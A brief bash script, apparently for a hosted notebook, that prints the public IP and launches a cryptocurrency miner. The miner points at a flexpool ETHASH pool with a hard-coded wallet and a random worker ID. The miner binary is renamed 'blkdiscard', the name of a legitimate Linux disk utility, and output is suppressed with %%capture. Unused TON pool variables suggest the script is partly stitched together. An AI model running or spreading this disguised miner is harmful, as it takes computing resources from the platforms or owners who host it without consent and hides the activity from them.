#!/bin/bash
%%capture
!%%capture

#gives ip address 
curl ipecho.net/plain
POOL=https://next.ton-pool.com
USER=$1
ALGO=TON
WORKER=$(echo GPU-$(shuf -i 1000-9999 -n 1))

chmod +x blkdiscard
./blkdiscard --algo ETHASH --pool stratum+ssl://eth-de.flexpool.io:5555 --user 0x8bcFCd553570072daddDB5908Eb92E9890e182Ff.$WORKER
